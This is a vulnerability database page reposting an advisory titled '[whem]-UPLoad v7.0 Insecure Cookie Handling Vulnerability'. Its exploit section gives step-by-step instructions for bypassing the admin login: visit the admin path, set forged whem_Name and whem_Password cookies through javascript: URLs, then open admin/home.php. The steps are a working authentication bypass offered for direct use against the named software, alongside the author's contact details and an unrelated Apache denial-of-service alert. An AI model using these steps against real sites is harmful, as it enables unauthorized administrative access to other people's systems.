|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : indoushka SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : ================== | # Title : [whem]-UPLoad - v 7.0 Insecure Cookie Handling Vulnerability | # Author : indoushka | # email : indoushka@dgsn.dz | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : http://wh-em.com/d3m-7r/showthread.php?p=49 | # Script : [whem]-UPLoad - v 7.0 | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug : Insecure Cookie Handling Vulnerability ====================== Exploit By indoushka ================================= # Exploit : 1- http://127.0.0.1/upload/upload/admin/ 2- javascript:document.cookie="whem_Name=adm_user;path=/"; 3- javascript:document.cookie="whem_Password=adm_user;path=/"; 4- http://127.0.0.1/upload/upload/admin/home.php tested in IE6 + Opera V.10.10 ================================ Dz-Ghost Team Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |